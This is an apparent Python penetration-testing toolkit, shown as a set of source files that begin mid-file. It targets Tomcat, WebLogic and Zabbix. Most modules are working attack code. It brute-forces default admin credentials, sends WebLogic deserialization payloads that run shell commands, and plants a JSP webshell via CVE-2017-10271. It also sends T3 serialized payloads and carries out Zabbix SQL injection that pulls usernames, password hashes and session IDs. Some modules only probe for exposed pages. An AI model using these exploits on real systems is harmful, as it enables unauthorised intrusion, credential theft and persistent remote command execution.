passwds: 20 | txt = account+':'+passwd 21 | encodestr = base64.b64encode(txt.encode('utf-8'))#使用base64加密爆破字符串 22 | encodestr = str(encodestr, 'utf-8')#将 b'' 这类的东西去掉 23 | url = URL + '/manager/html' 24 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 25 | Authorization = f'Basic {encodestr}' 26 | headers = {"User-Agent": user_agent,"Authorization":Authorization} 27 | try: 28 | r = requests.get(url,headers=headers, verify=False) 29 | if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text: 30 | print('[+]发现弱口令'+ txt) 31 | elif r.status_code == 401: 32 | print('账户密码错误:', txt) 33 | else: 34 | print('[-]爆破密码出错。') 35 | except: 36 | print('[-]访问管理页面出错') 37 | print('[+]检测结束-Tomcat-weak_pawsswd漏洞。[+]') 38 | print('\n') 39 | 40 | if __name__ == "__main__": 41 | attack() 42 | 
-------------------------------------------------------------------------------- /weblogic/CNVD_C_2019_48814.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import optparse 3 | import requests 4 | import base64 5 | 6 | ''' 7 | Usage: 8 | moon.py -u weblogic http://127.0.0.1:7001 9 | 这个脚本原始出处不知道哪位大神(py2),自己改了改(py3)。base64有个坑. bytes 和 str 转换python2和3有点区别。 10 | 本脚本可直接执行命令。 11 | 12 | CNVD-C-2019-48814 13 | 14 | 漏洞描述: 15 | WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 16 | 17 | 影响范围: 18 | WebLogic 10.X 19 | WebLogic 12.1.3 20 | 21 | http://192.168.1.126:7001/_async 22 | 403存在,404不存在 23 | 24 | http://192.168.1.126:7001/_async/AsyncResponseService 25 | 200存在,404不存在 26 | 27 | 修复: 28 | 打补丁 29 | 1、删除该wls9_async_response.war包并重启webLogic: 30 | 该war包具体路径如下: 31 | WebLogic 10.3.*: 32 | Middleware/wlserver_10.3/server/lib/bea_wls9_async_response.war 33 | WebLogic 12.1.3: 34 | Middleware/Oracle_Home/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war 35 | 2、 通过访问策略控制禁止 /_async/* 路径的URL访问。 36 | 37 | # 参考: 38 | ttps://www.jianshu.com/p/c4982a845f55?utm_campaign=hugo&utm_medium=reader_share&utm_content=note&utm_source=weixin-timeline&from=timeline 39 | https://mp.weixin.qq.com/s/xJAP11xxGpR9CCVJ-SHeLw 40 | https://mp.weixin.qq.com/s?__biz=MzA4MDk3NzQ2OA==&mid=2454386939&idx=1&sn=2201c2986bba691c97833703ab38ee6a&chksm=882253a8bf55dabe9287d189b6eab43835fb5e11d573409818bd53c03449695da1299cdaaa7f&scene=0&xtrack=1&key=2b014a6820a1af4646355cdad083dd430a0a72940aaabd4c5d122740e2e70fe4311cf3b26341a5c67db5680b48dbb2cc9929bb2c752762eefc55cbbe9dce6687e4ab70f7680a5d816dfca875600660b6&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou 41 | 
https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484258&idx=1&sn=f2213aec957aeb577c2d8f25bca2edd6&chksm=fa177fa1cd60f6b7634c1502b81a03c081827e9c3edb6151d75119433eafa91b080ce5549bf5&scene=0&xtrack=1&key=58a327fab9b03b4d45c412094df8e30eb0c8121282d89468600594c7b8c0bac551026570f083017558e66e639c43d0bad25d83481ed6e3122cf8f32c49b070a883b6f41e8b7f52597921748516633fe3&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou 42 | 43 | ''' 44 | 45 | headers = {'Content-type': 'text/xml'} 46 | uri = '/wls-wsat/CoordinatorPortType' 47 | linux_poc = ''' 48 | 49 | demoAction 50 | hello 51 | 52 | 53 | 54 | 55 | 56 | /bin/sh 57 | 58 | 59 | -c 60 | 61 | 62 | %s 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | ''' 75 | win_poc = ''' 76 | 77 | demoAction 78 | hello 79 | 80 | 81 | 82 | 83 | 84 | cmd 85 | 86 | 87 | /c 88 | 89 | 90 | %s 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | ''' 103 | 104 | 105 | def attack(URL): 106 | print('[*]开始检测-Weblogic-CNVD-C-2019-48814。[*]') 107 | cmd = str('whoami') 108 | base64cmd=base64.b64encode(cmd.encode('utf-8')) 109 | linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd.decode('utf-8') 110 | linux_poc2 = linux_poc % linux_poccmd 111 | win_poc2 = win_poc % cmd 112 | url2 = URL + '/_async/AsyncResponseService' 113 | try: 114 | r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=7) 115 | r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=7) 116 | if r1.status_code == 202 or r2.status_code == 202: 117 | print('[+]发现 CNVD-C-2019-48814! 请使用exp确认。') 118 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 119 | print('\n') 120 | else: 121 | print('[-]未发现 CNVD-C-2019-48814!') 122 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 123 | print('\n') 124 | except requests.ReadTimeout: 125 | print('[-]未发现 CNVD-C-2019-48814! 
Read timeout') 126 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 127 | print('\n') 128 | except Exception: 129 | print('[-]未发现 CNVD-C-2019-48814! some error') 130 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]') 131 | print('\n') 132 | 133 | if __name__ == '__main__': 134 | attack() -------------------------------------------------------------------------------- /weblogic/CVE_2017_10271.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import sys 3 | import requests 4 | import time 5 | from random import * 6 | import string 7 | 8 | 9 | 10 | ''' 11 | Usage: 12 | moon.py -u weblogic http://127.0.0.1:7001 13 | Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 14 | Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 15 | 访问:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType ,如果存在相关内容则存在漏洞 16 | ''' 17 | 18 | def gen_shell(): 19 | min_char = 4 20 | max_char = 12 21 | allchar = string.ascii_letters + string.digits 22 | shell_name = "".join(choice(allchar) for x in range(randint(min_char, max_char))) 23 | return shell_name 24 | 25 | 26 | def attack(URL): 27 | print('[+]开始检测-Weblogic-CVE-2017-10271。[+]') 28 | shellname = gen_shell() 29 | data = """ 30 | 31 | 32 | 33 | 34 | 35 | servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/"""+shellname+""".jsp 36 | 37 | "); 44 | while((a=in.read(b))!=-1){ 45 | out.println(new String(b)); 46 | } 47 | out.print(""); 48 | } 49 | %> 50 | ]]> 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | """ 60 | url = f'{URL}/wls-wsat/CoordinatorPortType' 61 | #proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'} 62 | headers = {"Content-Type":'text/xml', 63 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} 64 | try: 65 | r = requests.post(url,data=data, headers=headers) 66 | print('上传返回值为500为成功。上传返回值为:' + 
str(r.status_code)) 67 | try: 68 | r1 = requests.get(f'{URL}/bea_wls_internal/{shellname}.jsp') 69 | if r1.status_code == 200: 70 | print(f'webshell地址为:{URL}/bea_wls_internal/{shellname}.jsp?pwd=fff&cmd=whoami') 71 | else: 72 | print('获取shell失败。') 73 | except: 74 | print('获取shell失败。') 75 | except Exception: 76 | print('访问网页失败,未发现-Weblogic-CVE-2017-10271。') 77 | 78 | print('[+]检测结束-Weblogic-CVE-2017-10271。[+]') 79 | print('\n') 80 | 81 | if __name__ == "__main__": 82 | attack() -------------------------------------------------------------------------------- /weblogic/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # auther:dayu 3 | import requests 4 | import re 5 | 6 | heads = { 7 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 9 | 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 10 | 'Content-Type': 'text/xml;charset=UTF-8' 11 | } 12 | 13 | 14 | def attack(url): 15 | if not url.startswith("http"): 16 | url = "http://" + url 17 | if "/" in url: 18 | url += '/wls-wsat/CoordinatorPortType' 19 | post_str = ''' 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | /bin/bash 28 | 29 | 30 | -c 31 | 32 | 33 | whoami 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | ''' 44 | 45 | print('[+]开始检测-Weblogic-CVE-2017-3506。[+]') 46 | try: 47 | response = requests.post( 48 | url, data=post_str, verify=False, timeout=5, headers=heads) 49 | response = response.text 50 | response = re.search( 51 | r"\.*\<\/faultstring\>", response).group(0) 52 | except Exception: 53 | response = "" 54 | 55 | if 'java.lang.ProcessBuilder' in response or "0" in response: 56 | print('[+]发现 CVE-2017-3506 !!!') 57 | else: 58 | print('[-]未发现 CVE-2017-3506 ') 59 | print('[+]检测结束-Weblogic-CVE-2017-3506。[+]') 60 | print('\n') 61 | 62 | 63 | if __name__ == '__main__': 64 | attack() 65 | 
-------------------------------------------------------------------------------- /weblogic/CVE_2018_2628.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 原作者: xxlegend 3 | import socket 4 | import time 5 | import re 6 | import sys 7 | 8 | VUL=['CVE-2018-2628'] 9 | #remote ip changed to :127.0.0.1 10 | PAYLOAD=['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'] 11 | #remote ip:104.251.228.50 12 | #PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] 13 | VER_SIG=['\\$Proxy[0-9]+'] 14 | 15 | def t3handshake(sock,server_addr): 16 | sock.connect(server_addr) 17 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 18 | time.sleep(1) 19 | sock.recv(1024) 20 | print 'handshake successful' 21 | 22 | def buildT3RequestObject(sock,port): 23 | data1 = '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' 24 | data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) 25 | data3 = '1a7727000d3234322e323134' 26 | data4 = '2e312e32353461863d1d0000000078' 27 | for d in [data1,data2,data3,data4]: 28 | sock.send(d.decode('hex')) 29 | time.sleep(2) 30 | print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 31 | 32 | def 
sendEvilObjData(sock,data): 33 | payload='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' 34 | payload+=data 35 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 36 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 37 | sock.send(payload.decode('hex')) 38 | time.sleep(2) 39 | sock.send(payload.decode('hex')) 40 | res = '' 41 | try: 42 | while True: 43 | res += sock.recv(4096) 44 | time.sleep(0.1) 45 | except Exception as e: 46 | pass 47 | return res 48 | 49 | def checkVul(res,server_addr,index): 50 | p=re.findall(VER_SIG[index], res, re.S) 51 | if len(p)>0: 52 | print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 53 | else: 54 | print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 55 | 56 | def run(dip,dport,index): 57 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 58 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 59 | sock.settimeout(65) 60 | server_addr = (dip, dport) 61 | t3handshake(sock,server_addr) 62 | buildT3RequestObject(sock,dport) 63 | rs=sendEvilObjData(sock,PAYLOAD[index]) 64 | # print 'rs',rs #本地测试的时候这里有个奇怪的报错 65 | checkVul(rs,server_addr,index) 66 | 67 | if __name__=="__main__": 68 | dip = sys.argv[1] 69 | dport = int(sys.argv[2]) 70 | print 'Test Address:', dip, dport 71 | try: 72 | run(dip,dport,0) 73 | except: 74 | print(dport,dip,'is not vul.') 75 | -------------------------------------------------------------------------------- /weblogic/Common_page.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 
-*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u weblogic http://127.0.0.1:8080 7 | 用来查看weblogic常见的4个页面 8 | ''' 9 | 10 | def attack(URL): 11 | urls = ( 12 | '/console/login/LoginForm.jsp', 13 | '/wls-wsat/CoordinatorPortType', 14 | '/_async/AsyncResponseService', 15 | '/ws_utc/config.do' 16 | ) 17 | 18 | print('[+]开始检测-Weblogic-common_page。[+]') 19 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 20 | headers={"User-Agent":user_agent} 21 | for url in urls: 22 | url = URL + url 23 | try: 24 | verify_response = requests.get(url, headers=headers) 25 | 26 | if verify_response.status_code == 200: 27 | try: 28 | print('[*]页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 29 | except Exception: 30 | pass 31 | else: 32 | print('未发现页面:'+url) 33 | continue 34 | except Exception: 35 | print("[-]访问页面出错!") 36 | print('[+]检测结束-Weblogic-common_page。[+]') 37 | print('\n') 38 | 39 | if __name__ == "__main__": 40 | attack() 41 | -------------------------------------------------------------------------------- /weblogic/Main_weblogic.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import re 4 | import weblogic.CVE_2019_2725 5 | import weblogic.CVE_2017_10271 6 | import weblogic.ssrf 7 | import weblogic.weblogic_weakpasswd 8 | import weblogic.CNVD_C_2019_48814 9 | import weblogic.CVE_2017_3506 10 | import weblogic.Common_page 11 | 12 | 13 | def exec(URL): 14 | weblogic.Common_page.attack(URL) 15 | weblogic.CNVD_C_2019_48814.attack(URL) 16 | weblogic.CVE_2017_10271.attack(URL) 17 | weblogic.ssrf.attack(URL) 18 | weblogic.weblogic_weakpasswd.attack(URL) 19 | weblogic.CVE_2019_2725.attack(URL+'/') 20 | weblogic.CVE_2017_3506.attack(URL) 21 | 22 | print('[+]开始检测-Weblogic-CVE-2018-2628。[+]') 23 | # 切换工作路径 24 | 
os.chdir(os.path.realpath(__file__)[:38]) 25 | url = re.findall('//(.*?):', URL, flags=0)[0] 26 | ip = re.findall(r':(.*?)\Z', URL[6:], flags=0)[0] 27 | os.system(f"py -2 CVE_2018_2628.py {url} {ip}") 28 | print('[+]检测结束-Weblogic-CVE-2018-2628。[+]') 29 | 30 | 31 | if __name__ == "__main__": 32 | exec() 33 | -------------------------------------------------------------------------------- /weblogic/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /weblogic/ssrf.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u weblogic http://127.0.0.1:7001 8 | weblogic version: 10.0.2,10.3.6 9 | 修复:uddiexplorer 删除该目录下的文件,或者做权限配置,禁止对外访问。 10 | 如果可登陆,可在 Setup UDDI Explorer 处获得明确的内网IP 11 | ''' 12 | def attack(URL): 13 | print('[+]开始检测-Weblogic-ssrf-CVE-2014-4210。[+]') 14 | 15 | url = f'{URL}/uddiexplorer/' 16 | headers = {"Content-Type":'text/xml', 17 | "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} 18 | try: 19 | r = requests.get(url, headers=headers) 20 | if r.status_code == 200: 21 | print("存在weblogic-ssrf漏洞页面:"+url) 22 | else: 23 | print("[-]未发现漏洞页面。") 24 | except requests.exceptions.ConnectionError: 25 | print('[-]访问页面出错!') 26 | print('[+]检测结束-Weblogic-ssrf-CVE-2014-4210。[+]') 27 | print('\n') 28 | 29 | 30 | if __name__ == "__main__": 31 | attack() 32 | -------------------------------------------------------------------------------- /weblogic/weblogic_weakpasswd.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | 5 | ''' 6 | Usage: 7 | moon.py -u tomcat http://127.0.0.1:8080 8 | 爆破weblogic用户名账户密码。 9 | ''' 10 | 11 | def attack(URL): 12 | 
print('[+]开始检测-weblogic-weak_pawsswd漏洞。[+]') 13 | 14 | #设定用于爆破的账户密码 15 | a = 0 16 | accounts = ['guest','WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','portaladmin','mary'] 17 | passwds = ['guest','weblogic1','WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd','portaladmin'] 18 | for account in accounts: 19 | for passwd in passwds: 20 | url = URL + '/console/j_security_check' 21 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 22 | headers = {"User-Agent": user_agent} 23 | data = {'j_username':account,'j_password':passwd,'j_character_encoding':'UTF-8'} 24 | try: 25 | r = requests.post(url,headers=headers,data=data, verify=False) 26 | if 'Oracle WebLogic Server Administration Console' in r.text: 27 | pass 28 | elif 'Home Page - base_domain - WLS Console' in r.text: 29 | print('登录页面'+url) 30 | print('[+]发现弱口令:'+account+' '+passwd+'漏洞检测结束!') 31 | a = 1 32 | else: 33 | pass 34 | # print('[-]爆破发生错误,请检查网页是否可访问!') 35 | except: 36 | print('[-]访问weblogic登录页面出错,漏洞检测结束!') 37 | if a == 0: 38 | print('[-]检测结束未发现weblogic-weak_pawsswd弱口令。[-]') 39 | else: 40 | pass 41 | print('\n') 42 | 43 | if __name__ == "__main__": 44 | attack() -------------------------------------------------------------------------------- /zabbix_vuln/Authentication_Bypass.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | ''' 5 | Usage: 6 | moon.py -u zabbix http://127.0.0.1:8080 7 | 相关链接:https://cxsecurity.com/issue/WLB-2019100030 8 | 这个漏洞的话,姑且看看吧。测试的时候手里环境不是很全,可能有问题,上面原始脚本是perl的,可以试一下 9 | 影响范围:Zabbix <= 4.4 10 | The target is vulnerable. 
Try to open these links: 11 | https://TARGET/zabbix/zabbix.php?action=dashboard.view 12 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1 13 | https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1 14 | https://TARGET/zabbix/overview.php?ddreset=1 15 | https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1 16 | https://TARGET/zabbix/latest.php?ddreset=1 17 | https://TARGET/zabbix/charts.php?ddreset=1 18 | https://TARGET/zabbix/screens.php?ddreset=1 19 | https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1 20 | https://TARGET/zabbix/srv_status.php?ddreset=1 21 | https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1 22 | https://TARGET/zabbix/hostinventories.php?ddreset=1 23 | https://TARGET/zabbix/report2.php?ddreset=1 24 | https://TARGET/zabbix/toptriggers.php?ddreset=1 25 | https://TARGET/zabbix/zabbix.php?action=dashboard.list 26 | https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1 27 | ''' 28 | 29 | def attack(URL): 30 | urls = ( 31 | '/zabbix.php?action=dashboard.view', 32 | '/zabbix.php?action=dashboard.view&ddreset=1', 33 | '/zabbix.php?action=problem.view&ddreset=1', 34 | '/overview.php?ddreset=1', 35 | '/zabbix.php?action=web.view&ddreset=1', 36 | '/latest.php?ddreset=1', 37 | '/charts.php?ddreset=1', 38 | '/screens.php?ddreset=1', 39 | '/zabbix.php?action=map.view&ddreset=1', 40 | '/srv_status.php?ddreset=1', 41 | '/hostinventoriesoverview.php?ddreset=1', 42 | '/hostinventories.php?ddreset=1', 43 | '/report2.php?ddreset=1', 44 | '/toptriggers.php?ddreset=1', 45 | '/zabbix.php?action=dashboard.list', 46 | '/zabbix.php?action=dashboard.view&dashboardid=1' 47 | ) 48 | 49 | print('[+]开始检测- Zabbix 4.2 - Authentication Bypass。[+]') 50 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 51 | headers={"User-Agent":user_agent} 52 | for url in urls: 53 | url = URL + url 54 | try: 55 | verify_response = requests.get(url, 
headers=headers) 56 | 57 | if verify_response.status_code == 200 or 304 or 401: 58 | try: 59 | print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 60 | except Exception: 61 | pass 62 | else: 63 | continue 64 | except Exception: 65 | print("Someerror!") 66 | print('[+]检测结束-Zabbix 4.2 - Authentication Bypass。[+]') 67 | print('\n') 68 | 69 | if __name__ == "__main__": 70 | attack() 71 | -------------------------------------------------------------------------------- /zabbix_vuln/Main_zabbix.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import zabbix_vuln.zabbix_sql_CVE_2016_10134 3 | import zabbix_vuln.Authentication_Bypass 4 | 5 | 6 | def exec(URL): 7 | zabbix_vuln.zabbix_sql_CVE_2016_10134.attack(URL) 8 | zabbix_vuln.Authentication_Bypass.attack(URL) 9 | 10 | 11 | if __name__ == "__main__": 12 | exec() 13 | -------------------------------------------------------------------------------- /zabbix_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /zabbix_vuln/zabbix_sql_CVE_2016_10134.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import re 3 | import requests 4 | 5 | ''' 6 | Usage: 7 | moon.py -u zabbix http://x.x.x.x:xx 8 | zabbix的 profileIdx2 参数存在问题,存在sql注入。 9 | 影响范围,3.0.3 成功, 3.2.6 失败。 10 | 禁用guest账户,升级版本 11 | ''' 12 | 13 | 14 | def attack(URL): 15 | print('[+]开始检测-zabbix_sql-CVE-2016-10134。[+]') 16 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 17 | headers={"User-Agent":user_agent} 18 | url = URL + 
"/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" 19 | try: 20 | res = requests.get(url,headers=headers) 21 | xresponse = res.text 22 | print('访问URL成功,开始进行zabbix_sql注入漏洞检测。') 23 | except Exception: 24 | print('[-]未发现zabbix_sql注入漏洞。') 25 | else: 26 | try: 27 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" 28 | res = requests.get(url, headers=headers) 29 | response = res.text 30 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") 31 | results = result_reg.findall(response) 32 | print('管理员、用户名密码为:'+results[0]) 33 | except Exception: 34 | print('[-]获取用户名及密码失败。') 35 | try: 36 | url = URL + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" 37 | res = requests.get(url, 
headers=headers) 38 | response = res.text 39 | result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") 40 | results = result_reg.findall(response) 41 | print('SessionID为:' + results[0]) 42 | except Exception: 43 | print('[-]获取SessionID失败。') 44 | print('[+]检测结束-zabbix_sql-CVE-2016-10134。[+]') 45 | print('\n') 46 | 47 | 48 | if __name__ == '__main__': 49 | attack() 50 | --------------------------------------------------------------------------------